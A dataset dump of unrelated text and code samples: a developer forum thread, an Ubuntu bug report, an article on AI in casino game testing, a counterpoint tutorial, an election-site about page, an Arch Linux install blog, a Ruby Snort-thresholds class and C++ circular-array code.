Document
stringlengths 395
24.5k
| Source
stringclasses 6
values |
|---|---|
Have been playing around with Volt Framework a bit, which is great but it upset me that there was no HAML support so I added that in.
Well I keep pushing back the release by one week, and another, and another, because I want it to be perfect when I show it to the world, complete with a super-awesome suite of tests, and the most comprehensive documentation in the history of documentation, but truth is, I’m building this library more to scratch my own itch than anything else, and making it public so that if someone finds it useful, he may use it. And/or contribute back. So here goes:
I probably should post this as a post by itself, so it can appropriately get upvoted/downvoted/ignored. :P
This is my code generator. It grabs the schema from a mysql db, generates db code, http handlers, and a main package that ties them all together. The goal is to keep the schema in the database, along with constraints (this will work wayyyy better with Postgresql). For now I have code that checks against “not null” constraints. Badly, too. There’s a lot of ugly stuff in there. Oh my god, why am I clicking Post.
This is awesome! It’s rough for sure, but it’s a great way to get some code started, then trim out what you don’t need. Agreed, immediately useful.
This is cool, I like it a lot!
You could chain it to my equally-if-not-more sketchy automatic API documentation generator and truly make skynet https://github.com/dangerousbeans/doc_smoosher
I don’t know if that changes anything for you, but I generate a swagger (http://swagger.io/) file to describe the API. A friend of mine has convinced me that I needed to do something about json-ld and maybe hydra baked-in too. That’s not done yet, I still have a few concepts to wrap my head around of before I start these. XD
It has some rough edges, but is immediately useful for me, thanks. You looking for contributions or just a solo project?
Super glad it’s useful, all contributions welcome. Sorry I’m not hosting on github, I hear it’s appreciated for pull requests, it’s probably something I should consider? Again, glad it’s found some use for someone!
Github might be better for mass adoption, but I honestly don’t care, never used Gogs before – already filed a bug. Working with a very dumb DB with column names like type and so forth.
I have wanted this exact tool and just didn’t get started on it.
Pull requests aren’t a silver bullet. You could have a clone on github and see if you like what you get with pull requests. Not everyone does.
I have actually never used the native pull-request system built into git – good excuse to use it.
|
OPCFW_CODE
|
[Bug 189113] [NEW] restricted-extras install ruins fresh install of kubuntu but works well in ubuntu
ajeannotte at yahoo.com
Tue Feb 5 00:36:07 UTC 2008
Public bug reported:
i've had Ubuntu running on my 2 home PCs for 6-8 months now. for kicks,
i thought i'd give Kubuntu a go since i use a lot of their programs
(amarok, k3b, ktorrent, etc...)
after installation i install my favorite programs (nvidia driver, vlc) and the restricted extras. i've pretty much got my system down for a fresh install since i'm doing it a lot. i like to play around with things so i find i do fresh installs a lot. never had a problem with Ubuntu.
as soon as i install the ubuntu-restricted-extras package and install
it, it blows up. package manager gives me an error message about not
being traceable... or something close to that (i'm not in front of it
right now)... and when i try to open the package manager again (or apt-
get) it tells me that it's already in use. even after i reboot it's
still in conflict.
if i try to have it resolve it's own conflict it blows up again.
so far the thing i've tried are:
- 5 or so fresh installs (at least)
- installing restricted extras first
- updating system first
- tried both ubuntu-restricted-extras and kubuntu-restricted-extras
- used 'top' to try to find which processes are active and killing them
- tried it on both computers
- AMD 5600+ X2 / nvidia 7900 GT
- AMD 4200+ X2 / nvidia 8500
i'm buggered. this problem is past my limit of usefullness.
right now i've got it installed on a separate partition, all my favorites installed, amarok with mp3 support, vlc plays all video formats that i need (haven't found any video it won't play yet), firefox with flash, but i did it withough using the restricted extras package.
i suppose i really don't need help as it's running, but it would be nice
if i could just go to the restricted-extras and have it not ruin my
fresh install. if i didn't have as much spare time as i do right now i'd
have given up on kubuntu without even giving it a try.
** Affects: kubuntu-restricted-extras (Ubuntu)
restricted-extras install ruins fresh install of kubuntu but works well in ubuntu
You received this bug notification because you are a member of Kubuntu
Team, which is a bug contact for kubuntu-restricted-extras in ubuntu.
More information about the kubuntu-bugs
|
OPCFW_CODE
|
The impact of artificial intelligence (AI) in Lucky Cola game testing can be significant, revolutionizing the way games are developed, tested, and improved. AI technologies can streamline and enhance various aspects of game testing, leading to better user experiences and more efficient game development processes. Here’s an explanation of how AI can influence game testing in an online casino context:
1. **Automated Testing:** AI-powered automation tools can simulate player interactions and test various game scenarios automatically. This helps identify bugs, glitches, and inconsistencies much faster than manual testing. Automated testing also ensures that different parts of the game are thoroughly examined, reducing the risk of overlooking issues.
2. **Performance Testing:** AI can simulate a large number of players accessing the game simultaneously, testing its performance under stress conditions. This helps ensure that the game’s servers can handle the expected load during peak times without crashes or slowdowns.
3. **Behavior Analysis:** AI can analyze player behavior within the game, identifying patterns and anomalies that might indicate cheating or suspicious activities. This is particularly relevant in online casino games to maintain fair play and security.
4. **Quality Assurance:** AI algorithms can assess the quality of the game by comparing it to established benchmarks or standards. This helps ensure that the game meets expected levels of graphical quality, gameplay mechanics, and overall user experience.
5. **Bug Detection and Prevention:** AI can learn from previous testing cycles and identify common patterns associated with bugs or glitches. As a result, it becomes better at predicting potential issues in new game versions and helps developers prevent the recurrence of known problems.
6. **Personalization Testing:** In games that offer personalized experiences, AI can simulate various player profiles and preferences to test how well the game adapts and provides a tailored experience to different types of players.
7. **Regression Testing:** Whenever updates or changes are made to a game, AI can help automate regression testing, ensuring that new updates don’t inadvertently introduce new bugs or problems into previously resolved areas of the game.
8. **Balancing and Fairness:** AI can simulate different scenarios and assess game balance and fairness. This is especially important in online casino games, where the odds and outcomes need to be carefully calibrated to ensure fair gameplay.
9. **Speed and Efficiency:** AI-powered testing tools can significantly accelerate the testing process, reducing the time it takes to identify and fix issues. This expedites game development cycles and allows for quicker release of updates and new features.
10. **User Feedback Analysis:** AI can process user feedback and reviews to identify recurring issues or suggestions. This feedback-driven approach helps developers prioritize improvements that directly impact player satisfaction.
11. **Continuous Improvement:** Over time, AI systems can learn from testing data and player behavior to provide insights that contribute to continuous game improvement. This feedback loop can lead to a more engaging and enjoyable player experience.
While AI offers numerous benefits to game testing, it’s important to note that it’s not a complete replacement for human testers. Human testers provide valuable insights into subjective experiences and unexpected scenarios that AI might not be able to capture. A balanced approach that combines AI-driven automation with human expertise is often the most effective way to ensure high-quality game testing in online casinos like Lucky Cola.
|
OPCFW_CODE
|
Following on from Fifth Species in two parts, Fux continues by going through all five species in three parts, and then four, against a cantus firmus. You will find those sections in Mann's translation (The Study of Counterpoint).
The next section of Gradus is in Mann's The Study of Fugue. At this point Fux's original text includes a "brief explanation of the use of suspensions in free writing"; for some reason Mann does not include this in his translation. Therefore I'll look at some examples and offer my interpretation of what may be going on.
The above extracts show "percussed" dissonances which we can identify as accented passing notes. In the first two the discord is a second above the lower note falling to a unison (f to e, and a to g), and in the third extract the discord is a compound second falling to an octave. In all three cases the upper note steps up again to form a discord which is resolved when the suspended lower note falls in the usual manner.
In these three extracts the dissonant passing note in the lower voice is a 7th falling to an 8ve. Again the note steps back up to form a discord which is resolved when the other (suspended) voice falls by step. In the second and third extracts we also see the accented passing note in the upper voice as used in the first examples.
These two extracts show a 4th used as an accented passing note. In contrast to the previous examples, these two show the melodic movement continuing down rather than stepping back up. Note that in all but one of the 8 extracts above the suspension has been approached by leap from below.
Infrequently, Fux uses the accented passing notes without a suspension. The second example in this group is the only one we've seen in which the accented passing note is in an ascending line.
Finally, here is the first two part fugue from Gradus. The new points to note are:
The next chapters of Gradus which are included in Mann's The Study of Fugue cover fugue in three & four parts, and double (invertible) counterpoint at the octave, tenth, and twelfth. The final fugues show the use of two or three subjects.
Mann's book includes sizeable chunks from texts by Marpurg, Albrechtsberger (who taught Beethoven), and Martini (who taught J.C.Bach and Mozart). These are superb works with wonderful examples; for instance Albrechtsberger's text includes a number of canons and riddle canons by Palestrina, Mozart, and others.
Please contact me with any comments, corrections, or suggestions for additional material about these web pages.
Please link to the main page, this will increase the page ranking on the search engines.
Contact me if you want to be included on my links page, or wish to suggest appropriate links.
You can help to encourage ongoing development of the pages and the applets by purchasing something you need from the affiliate links, or by a donation.
All the music examples on this page were drawn using Lilypond.
|
OPCFW_CODE
|
module Threshold
class InvalidThresholdsObject < StandardError; end
class ReadOnlyThresholdFile < StandardError; end
class NonExistantThresholdFile < StandardError; end
class MissingThresholdFileConfiguration < StandardError; end
class ThresholdAtomicLockFailure < StandardError; end
class Thresholds
extend Forwardable
attr_accessor :file, :readonly
def_delegators :@thresholds, :<<, :length, :push, :pop, :first, :last, :<=>, :==, :clear, :[], :[]=, :shift, :unshift, :each, :sort!, :shuffle!, :collect!, :map!, :reject!, :delete_if, :select!, :keep_if, :index, :include?
def initialize(thresholds = [])
@thresholds = thresholds
end
# Write changes to the file
def flush
begin
valid_existing_file?(@file)
raise ReadOnlyThresholdsFile if @readonly
hash = current_hash
file = File.open(@file, 'w+')
raise ThresholdAtomicLockFailure, 'The @file state/hash changed before we could flush the file' unless stored_hash == hash
file.write self.sort.to_s
file.close
rescue NonExistantThresholdFile
raise ReadOnlyThresholdsFile if @readonly
file = File.open(@file, 'w')
file.write self.sort.to_s
file.close
end
stored_hash=current_hash
return true
end
# Clears current collection and Read in the thresholds.conf file
def loadfile!
@thresholds.clear
loadfile
end
# Append in the thresholds.conf file to current collection
def loadfile
valid_existing_file?(@file)
results = Threshold::Parser.new(@file)
@stored_hash= results.filehash
#puts stored_hash
results.caps.each do |result|
builder = Threshold::Builder.new(result)
self << builder.build
end
end
# Check if all objects in the Threshold Instance report .valid?
def valid?
begin
self.each do |threshold|
if threshold.respond_to?(:valid?)
return false unless threshold.valid?
else
raise InvalidThresholdsObject, "Container object has unknown objects"
end
end
return true
rescue InvalidThresholdsObject
return false
end
end
# Printer
# Pass (true) to_s to skip the printing of InternalObjects.comment
def to_s(skip = false)
output = ""
raise InvalidThresholdsObject, "Container object has unknown objects" unless valid?
self.each do |threshold|
output << threshold.to_s(skip) + "\n"
end
return output
end
# The calculated hash of the threshold.conf file at load time.
def stored_hash
@stored_hash
end
def to_a
@thresholds
end
## Forwardable Corrections:
## Corrected for forwardable due to Core Array returning new Arrays on the methods.
# Array(@thresholds) Creates a new Array on @threshold.sort so.. direct forwardable delegation fails.
# Returns a new Threshold Object
def sort
Thresholds.new(@thresholds.sort)
end
# Returns a new Threshold Object
def reverse
Thresholds.new(@thresholds.reverse)
end
# Returns a new Threshold Object
def shuffle
Thresholds.new(@thresholds.shuffle)
end
# Returns a new Threshold Object
def reject(&blk)
if block_given?
Thresholds.new(@thresholds.reject(&blk))
else
Thresholds.new(@thresholds.reject)
end
end
# Returns a new Threshold Object
def select(&blk)
if block_given?
Thresholds.new(@thresholds.select(&blk))
else
Thresholds.new(@thresholds.select)
end
end
#Uniques by default to printable output
# Returns a new Threshold Object
def uniq(&blk)
if block_given?
Thresholds.new(@thresholds.uniq(&blk))
else
Thresholds.new(@thresholds.uniq{ |lineitem| lineitem.to_s(true) })
end
end
## Complex SET Methods
## &(union), | (intersect), + (concat), - (Difference)
# + (concat)
# Returns a new Threshold Object
def +(an0ther)
Thresholds.new(@thresholds + an0ther.to_a)
end
# | (intersect)
# Returns a new Threshold Object
def |(an0ther)
Thresholds.new(@thresholds | an0ther.to_a)
end
# & (union)
# Returns a new Threshold Object
def &(an0ther)
Thresholds.new(@thresholds & an0ther.to_a)
end
# - (Difference)
# Returns a new Threshold Object
def -(an0ther)
Thresholds.new(@thresholds - an0ther.to_a)
end
# Returns a new Threshold Object with just suppressions
def suppressions(&blk)
if block_given?
self.suppressions.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::Suppression"})
end
end
# Returns a new Threshold Object with just event_filters
def event_filters(&blk)
if block_given?
self.event_filters.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::EventFilter"})
end
end
# Returns a new Threshold Object with just rate_filters
def rate_filters(&blk)
if block_given?
self.rate_filters.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::RateFilter"})
end
end
private
def stored_hash=(foo)
@stored_hash=foo
end
def current_hash
file = File.open(@file, 'rb+')
file.flock(File::LOCK_EX)
hash = Digest::MD5.file @file
file.close
return hash
end
def valid_existing_file?(file)
if file !=nil
raise NonExistantThresholdFile, "Missing threshold.conf" unless (File.file?(file) and File.exists?(file))
else
raise MissingThresholdFileConfiguration, "Missing threshold.conf path. See README for Usage."
end
return true
end
end
end
|
STACK_EDU
|
I am trying to use the NCS to run some low-level TensorFlow code (i.e., not train a NN but use TF's algebraic operations directly). As a simplified example of what I would eventually like to do, I have written Python code to create a TF graph that computes the number of iterations for a given point in the Mandelbrot set (code here: https://gist.github.com/riccardomurri/c293abc5a51a39a50512779dca72c727 )
Now the code runs correctly in TF on my laptop, but both
mvNCCompile fail with the same error:
$ mvNCCheck -in IN:0 -on OUT mandelbrot.meta ... (Python deprecation warnings removed) ... mvNCCheck v02.00, Copyright @ Intel Corporation 2017 ... (Python deprecation warnings removed) ... Traceback (most recent call last): File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1327, in _do_call return fn(*args) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1312, in _run_fn options, feed_dict, fetch_list, target_list, run_metadata) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1420, in _call_tf_sessionrun status, run_metadata) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/errors_impl.py", line 516, in __exit__ c_api.TF_GetCode(self.status.status)) tensorflow.python.framework.errors_impl.NotFoundError: Unsuccessful TensorSliceReader constructor: Failed to find any matching files for mandelbrot [[Node: save/RestoreV2 = RestoreV2[dtypes=[DT_INT32, DT_FLOAT, DT_FLOAT], _device="/job:localhost/replica:0/task:0/device:CPU:0"](_arg_save/Const_0_0, save/RestoreV2/tensor_names, save/RestoreV2/shape_and_slices)]]
mandelbrot.meta file is there and can be correctly read (and the graph computed) by the
mandelbrot_r.py program (link to code above). What am I doing wrong?
@riccardomurri When using the NCSDK with a TensorFlow model, the NCSDK expects either a pb file or a meta file, a data file and an index file. If you're using a meta file, make sure your data and index file are named with the same prefix. It looks like you may be missing those files (data and/or index) or they may be named differently from your meta file.
Hello @Tome_at_Intel , many many thanks for this explanation! One further question: what should be in the data and index files? (or equivalently, how do I produce the combined
.pb file?) Whn using TF's own
import_meta_graph, everything works fine on my laptop…
@riccardomurri You're welcomed. This Stackoverflow.com answer by T.K Bartel and trdgny may help helpful to you: https://stackoverflow.com/questions/41265035/tensorflow-why-there-are-3-files-after-saving-the-model. Summarizing the answer, you need to import the meta graph and re-save it. Try using the following code and let me know if it works for you.
with tf.Session() as sess: saver = tf.train.import_meta_graph(YOUR META GRAPH FILE HERE) save_path = saver.save(sess, "/tmp/model.ckpt") print("Model saved in file: %s" % save_path)
|
OPCFW_CODE
|
Domains of univariate polynomials
Dom::UnivariatePolynomial(<Var, <R, <Order>>>)
Dom::UnivariatePolynomial(Var, R, Order)(p)
Dom::UnivariatePolynomial(Var, R, Order)(lm)
Dom::UnivariatePolynomial(Var, R, ..) creates the domain of univariate polynomials in the variable Var over the commutative ring R.
Dom::UnivariatePolynomial represents univariate polynomials over arbitrary commutative rings.
All usual algebraic and arithmetical polynomial operations are implemented, including Gröbner basis computations.
Dom::UnivariatePolynomial(Var, R, Order) creates a domain of univariate polynomials in the variable Var over a domain of category Cat::CommutativeRing in sparse representation with respect to the monomial ordering Order.
Dom::UnivariatePolynomial() creates the univariate polynomial domain in the variable x over the domain Dom::ExpressionField(normal) with respect to the lexicographic monomial ordering.
Dom::UnivariatePolynomial(Var) creates the univariate polynomial domain in the variable Var over the domain Dom::ExpressionField(normal) with respect to the lexicographic monomial ordering.
Note: Only commutative coefficient rings of type DOM_DOMAIN which inherit from Dom::BaseDomain are allowed. If R is of type DOM_DOMAIN but inherits not from Dom::BaseDomain, the domain Dom::ExpressionField(normal) will be used instead.
For this domain only identifiers are valid variables.
Note: It is highly recommend to use only coefficient rings with unique zero representation. Otherwise it may happen that, e.g., a polynomial division will not terminate or a wrong degree will be returned.
Please note that for reasons of efficiency not all methods check their arguments, not even at the interactive level. In particular this is true for many access methods, converting methods and technical methods. Therefore, using these methods inappropriately may result in strange error messages.
To create the ring of univariate polynomials in x over the integers one may define
Now, let us create two univariate polynomials.
The usual arithmetical operations for polynomials are available:
The leading coefficient, leading term, leading monomial and reductum of a are
and a is of degree
The method gcd computes the greatest common divisor of two polynomials
and lcm the least common multiple:
Computing the definite and indefinite integral of a polynomial is also possible,
which is in the case of indefinite integration simply the antiderivative of the polynomial.
But, since for representing the indefinite integral of a the coefficient ring chosen as the integers is not appropriate, the polynomial ring over its quotient field is used instead.
Furthermore, interpreting the polynomials as polynomial functions is also allowed in applying coefficient ring elements, polynomials of this domain or arbitrary expressions with option Expr to them:
To get a vector of coefficients of a polynomial, which gives the dense representation of it, one may use the method vectorize.
An indeterminate given by an identifier; default is x.
A commutative ring, i.e. a domain of category Cat::CommutativeRing; default is Dom::ExpressionField(normal).
A monomial ordering, i.e. one of the predefined orderings LexOrder, DegreeOrder or DegInvLexOrder or an element of domain Dom::MonomOrdering; default is LexOrder.
A polynomial or a polynomial expression.
List of monomials, which are represented as lists containing the coefficients together with the exponents or exponent vectors.
The characteristic of this domain.
The coefficient ring of this domain as defined by the parameter R.
The name of the domain created.
The neutral element w.r.t. "_mult".
The monomial order as defined by the parameter Order.
The list of the variable as defined by the parameter Var.
The neutral element w.r.t. "_plus".
coeff(a, Var, n)
coeff(a, Var, n) returns the coefficient of the term Var^n as an element of R.
coeff(a, n) returns the coefficient of the term Var^n as an element of R.
This method overloads the function coeff for polynomials.
|
OPCFW_CODE
|
The Sub-items setting was added by Notion as a way to better visualize parent-child relationships, allowing you to display your entries in a tiered structure for the following views.
As many of our templates contain databases with existing Parent Item → Sub-Item relations, we’ve put together a handy guide on how to enable this feature for any supported view in your system. Try it out in the following!
- Ultimate Tasks
- Ultimate Brain
- Creator’s Companion (Ultimate Tasks Edition)
For this example, we’ll be enabling sub-items for the Timeline View, as it is found in all of the templates mentioned above. The location of this page will differ depending on the template being used, so check for your template type in the toggle below.
Timeline View Locations
- Views (Toggle) → Timeline View
Ultimate Brain, Ultimate Brain + Creator’s Companion
- Task Manager → Quick Links (Toggle) → Page Links (Toggle) → Timeline View
Creator’s Companion + Ultimate Tasks
- Ultimate Tasks for Creator’s Companion → Views (Toggle) → Timeline View
Once on this page, click the ellipsis icon ••• to the left of the blue New button to open the View options panel, and then select the Sub-items option.
In this menu you’ll have the option to use an existing relation or create a new one. As the All Tasks database already contains a Parent Task → Sub-Tasks relation, you can click Property under Use an existing relation and then select Sub-Tasks. Here you’ll be given two additional options.
- Set on all new All Tasks views
- Set on this view
For this example’s purposes select the second option, Set on this view.
Success! The view will quickly update to display only top-level tasks, with those containing sub-tasks receiving an arrow icon ► at the far left of the row. Clicking this arrow will display all of the sub-tasks contained within.
Sub-items can be quickly created by clicking a parent task’s New sub-item button.
- Existing parent tasks: these will be shown with a black arrow icon ► at the far left of the row. Clicking this will display all of the sub-tasks and the New sub-item button.
- Regular top-level tasks: while hovering over these, a greyed out version of the arrow icon ► will appear at the far left of the row. Clicking this will display the New sub-item button.
You can also drag and drop pages under existing parent tasks to turn them into sub-items.
In the example shown below, an additional filter of
Design has been added to the view. As the parent task does not meet this requirement but has sub-tasks that do, the parent task is shown in a permanently grayed out and expanded state.
Turning Off Sub-items
If you wish to disable sub-items for a view, or all new views for that database, simply click the ellipsis icon ••• to open the View options panel, then click Sub-items, and then select Turn off sub-items. Here you’ll be given two additional options.
- Turn off for this view
- Turn off for all new views
Things to Note
Previous & Next Page navigation does not work for sub-tasks. When opening a sub-task from a view with sub-items enabled, there will be no Previous or Next Page buttons at the top of the entry, and their keyboard shortcuts will not work.
Database search does not take into account sub-items. Only top-level items are searched, any sub-items matching the term will not be shown.
In table views, a column’s ‘Calculate’ setting does not take into account sub-items. Only top-level items are used when calculating these values.
Sub-item structures do not remember their state and will always close. Unlike toggles, views with sub-items enabled will return to a closed state when you navigate away from a page and then return. Note: Parent tasks will remain expanded if they do not meet a filter’s requirements but have sub-tasks that do.
|
OPCFW_CODE
|
Assembley Election 2022
This website is a clone of the original electionsni.org website, being updated for the Assembly Election 2022 by Callum Ormerod, as the original site is no longer being supported by the NICVA.
Updating this website has been a fairly last minute endevour, so please bare with me if there are any problems/issues/delays.
If anyone is attending any of the counts and wishes to help by providing informations after each round, please contact me on twitter, or by email (email@example.com)
Full credit to Bob Harper and Brian Cleland for the exceptional initial design of this website and for making it available on Github, so that I'm able to do this.
The Elections NI Open Data project is a collaboration of people who wanted to produce datasets and visualisations of the 2016 Northern Ireland Assembly elections, led by ODI Belfast at NICVA and the NI Open Government Network.
We don't receive funding for the project and we are independent of any political party or candidate. However, we are grateful to NICVA for providing the domain name.
Though we use data produced by the Electoral Office for Northern Ireland, we are not associated with them in any way, and this website does not imply that we (or our data) are endorsed by them.
You can find us on Twitter: @ElectionsNI
If you're are observing at a count centre you can help contribute to the live data. This won't take much of your time, just snap a picture of the results board, email or tweet it to us, and we'll update the live results (see the 2011 version). That's it!
It doesn't matter if you're observing as an individual or for a party, you can still help. If you'd like to be involved and contribute to the open database, please get in contact:
You will need to apply for an electoral observer pass from the Electoral Commission by midnight on Tuesday 21 February 2017: click here for details.
The eight count centres are:
- Seven Towers Leisure Centre, Ballymena
- Foyle Area, Derry/Londonderry
- Lagan Valley Leisureplex, Lisburn
- Valley Leisure Centre, Newtownabbey
- Titanic Exhibition Centre, Belfast - We have enough volunteers to cover Belfast. If you're able to help with one of the other locations that would be better. Thanks!
- Banbridge Leisure Centre
- Aurora Leisure Complex, Bangor
- Omagh Leisure Complex
More information about the centres and observing is available on the Electoral Office website.
- Website, framework and visualisations: Bob Harper and Brian Cleland
- Database layout: shared by the Irish Local Government Association (LGMA)
- Count stages visualisation: shared by James Bligh (@anamates) under the Creative Commons Attribution 4.0 International License (originally for Irish GE 2016)
- The icon used on the Twitter account was created by Jonathan Li
We are particularly grateful to those who are giving their time to cover the results at the count centres:
Annamay McNally, Austin Orr, Cliodhna Rae, Colm Burns, David McBurney, Gráinne Walsh, Ryan McAleer, Steve Donnan, Stratagem NI
You can also join the Open Government Network Forum.
|
OPCFW_CODE
|
In 2010, I took over lecturing 8.033, MIT's course on special relativity (SR). It's a bit of an odd element in our undergraduate curriculum, since SR is not really enough by itself to constitute a full semester-long course. I decided to focus on the idea that Lorentz symmetry is the guiding principle of the subject, and showed how by developing a notation that makes incorporating this symmetry "automagic," most of SR can be built up in a fairly straightforward way. The course concludes by discussing (very, very briefly) some of the concepts of general relativity (GR), showing how with the framework we developed for SR, GR doesn't require a very big conceptual leap. (Although, it does require a rather larger leap in terms of the kinds of calculations and computations that need to be done. As a consequence, 8.033 can only scratch the surface of this topic.)
Over the two years that I developed 8.033, I developed a decent set of handwritten notes on the subject, which multiple people have written asking about. I have accordingly decided to post them on my MIT webpage. Note that Fall 2011 is the last semester I taught this course. I went on sabbatical in Fall 2012, and Peter Fisher took over the lectures; he was followed by Tracy Slatyer. If I had taught the course more, I might have cleaned up the notes some more, perhaps even typed them up. Since I did not, these notes are the best I've got available. They follow the schedule and syllabus of Fall 2011, and likely do not synch up with the schedule of other semesters.
These notes are provided as is; I don't guarantee that they are free of typos or stupid mistakes. Feel free to send me corrections via email. I may post corrections when I have time, but don't hold your breath waiting!
2. Galilean relativity and waves: How the wave equation behaves under a Galilean transformation; electromagnetic waves; failure to find the "ether" in which these waves live; constancy of the speed of light.
3. Lorentz transformations: Consequences of light's constant speed; time dilation and length contraction; the Lorentz transformation.
4. The geometry of spacetime: How to combine space and time into a single entity in a way that makes sense from the viewpoint of the Lorentz transformation. Invariant intervals; spacelike, timelike, and lightlike separations.
5. Geometric objects in spacetime: 4-vectors and their transformation properties. Introduction to the index notation. Kinematics of moving objects in SR.
6. More kinematics: Velocity addition rule. Conservation of energy and momentum; derivation of E = mc2.
7. 4-momentum: Unifying momentum and energy into a single spacetime object. Spacetime invariants more generally; 4-velocity.
8. Accelerated motion: The twin paradox, forces.
9. More on forces: Summary of electrodynamics; spacetime tensors.
10. More on tensors: The metric tensor; covariant and contravariant 4-vector components; how this notation allows us to construct invariants and examine how quantities transform between frames easily.
11. More transformation laws: Focus on transformation of electromagnetic fields.
12. Transformation of fields 2: Another way to understand the transformation of electromagnetic fields, focused on the way sources transform.
13. Interlude: Principle of least action, preparing for an introduction to general relativity.
14. Principle of least action: Fermat's principle, Lagrangian mechanics. Constants of the motion.
15. Motion in spacetime: Principle of extremal aging, geodesics. Introduction to field theories.
16. Relativistic field theories: Applying the principles we have learned to build a theory of interactions due to some fundamental field in manner consistent with the requirements of relativity.
17. Gravity 1: The challenges of incorporating relativity into a theory of gravity. First considerations on how to do this.
18. Gravity 2: Further details on making gravity relativistic; the principle of equivalence.
19. Geodesics in curvilinear coordinates: As preparation to modeling trajectories under gravity, first look at trajectories in special relativity, but in complicated coordinate systems.
20. Gravity 3: A cartoon-level overview of where spacetimes that describe gravity come from; some example solutions; motion in these spacetimes. Demonstration that this motion incorporates gravity. Non-Newtonian gravitational effects.
21. Strong gravity: Black holes.
21'. Strong gravity: Some details of the black holes lecture that, for some reason, are in a different PDF file.
22. Cosmology 1: The large-scale structure
of our universe. Principles.
22'. Cosmology 1: Some details of the cosmology lecture that, for some reason, are in a different PDF file.
23. Cosmology 2: Our universe, at least as modern observations appear to indicate.
|
OPCFW_CODE
|
I will try to explain the issues and problems I have faced while installing Arch, so you can avoid them.
Firstly, I am guessing your device is pretty much new and the hardware you are using is also overkill. mine is average, you can check them by clicking here.
Installation process. Yep, pretty much the most frustrating part, right? :)) While there are various guides, video tutorials, and such blogs, unfortunately, most of them are outdated as
archis being updated quite often making the whole process of installation for the beginners harder every day.
Followed by a successfully booting up, all of my wifi settings, which A have configured throughout the installation process was gone. Unfortunately, did not really also have any ethernet cable to resolve the issue at least temporarily either, which triggered me to find a better and more optimal solution as it is not going to be my last time of arch installation.
“All men can see the tactics whereby I conquer, but
what none can see is the strategy out of which victory
is evolved.” - Sun Tzu
- While surfing, I have come up with such an amazing, perfect, and insane version, called as
Archlabs. This literally made my day. Whole
archinstallation with terminal based gui installation? YESSIR!
“So in war, the way is to avoid what is strong and to
strike at what is weak.” - Sun Tzu
- The installation of official
arch linuxline-by-line is the
strongpart in this war, which I had to avoid, so I have targeted the
archlabsinstallation: burned the
.isodirectly to my usb, and installed the system by watching the video here.
There even was no need to install any
desktop environmentas I have selected
Internet connection is stable as well as the desktop environment, both ready to rumble.
“Victorious warriors win first and then go to war,
while defeated warriors go to war first and then seek to win” - Sun Tzu
- Making sure the system is updated and secure, so no one can vuln me. The general and required installations, such as
yayand etc. are also done here.
- Screen brightness being stuck at 0, no existing software to help you to change it at all, no shortcut commands working…
“To know your Enemy, you must become your Enemy.” - Sun Tzu
Exactly. thinking the way
archwould think. Maybe rebuilding the kernel with custom commands? No. Could not even make its way to lighting…
intel graphics? No. I can not run of the fight that easily. As long as I think I know I will win it!
Wait, changing the
nvidiadrivers? Yes! This should be it. But, which version, how, where?
“Opportunities multiply as they are seized.” - Sun Tzu
Download and install your current kernel version regarding
sudo pacman -S linux-headers# (this will install the latest kernel version according linux-headers)
- Head over to https://archive.archlinux.org/packages/l/ and download the corresponding
linux-headersmanually and install it manually by typing
sudo pacman -U linux-header-x.x.x.tar.xz
Generate the grub file (if you are using
grub-mkconfig -o /boot/grub/grub.cfg
Before moving further, there is a need for blacklisting
nouveaudriver, which is done as following:
- Head over to
blacklist.confwith any editor
- Add the following lines to the end of
options nouveau modeset=0
- Head over to
Here it is. Besides
nvidia, I had it working on
460-x, but, but which one exactly? One mistake can destroy my whole plan.
Time to prepare the environment to test each of them.
“Let your plans be dark and impenetrable as night, and when you move, fall like a thunderbolt.” - Sun Tzu
A page regarding all the previous versions of
nvidiadrivers was leaked, time to use it. Click here to get there!
This is the way! Followings are done in order to complete the setup of attack:
sudo pacman -S linux-headers
Almost, there! will upgrade the
nvidiadriver version just a step upper, here we are:
sudo ./NVIDIA-Linux-x86_64-460.91.03.run --kernel-source-path=/lib/modules/5.13.13-arch1-1/build
sudo ./NVIDIA-Linux-x86_64-460.91.03.run --kernel-source-path=/lib/modules/5.13.0-28-generic/build
- Not an easy fight at all, hours of effort and research, planning, but as Sun said:
“If you know the enemy and know yourself, you need not to fear the result of a hundred battles.”
|
OPCFW_CODE
|
/* JEBBase: generic algorithms and functions
* Copyright 2015 Jan Erik Breimo
* All rights reserved.
*
* This file is distributed under the BSD License.
* License text is included with the source distribution.
*/
#include <algorithm>
#include <cassert>
namespace JEBBase { namespace Containers {
template <typename T>
CircularArrayWrapper<T>::CircularArrayWrapper(T* data, size_t size)
: m_Data(data),
m_Size(size)
{}
template <typename T>
T& CircularArrayWrapper<T>::operator[](size_t index)
{
return m_Data[index % m_Size];
}
template <typename T>
CircularArray2D<T>::CircularArray2D()
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(size_t dim0, size_t dim1)
: m_Data(dim0, dim1)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(std::pair<size_t, size_t> size)
: m_Data(size)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(const Array2D<T>& data)
: m_Data(data)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(Array2D<T>&& data)
: m_Data(std::move(data))
{}
template <typename T>
CircularArrayWrapper<T> CircularArray2D<T>::operator[](size_t i)
{
return CircularArrayWrapper<T>(m_Data[i % m_Data.rows()],
m_Data.columns());
}
template <typename T>
CircularArrayWrapper<const T> CircularArray2D<T>::operator[](size_t i) const
{
return CircularArrayWrapper<const T>(m_Data[i % m_Data.rows()],
m_Data.columns());
}
template <typename T>
size_t CircularArray2D<T>::rows() const
{
return m_Data.rows();
}
template <typename T>
size_t CircularArray2D<T>::columns() const
{
return m_Data.columns();
}
template <typename T>
std::pair<size_t, size_t> CircularArray2D<T>::size() const
{
return m_Data.size();
}
template <typename T>
void CircularArray2D<T>::setSize(size_t dim0, size_t dim1)
{
m_Data.setSize(dim0, dim1);
}
template <typename T>
void CircularArray2D<T>::setSize(std::pair<size_t, size_t> size)
{
m_Data.setSize(size);
}
template <typename T>
Array2D<T>& CircularArray2D<T>::data()
{
return m_Data;
}
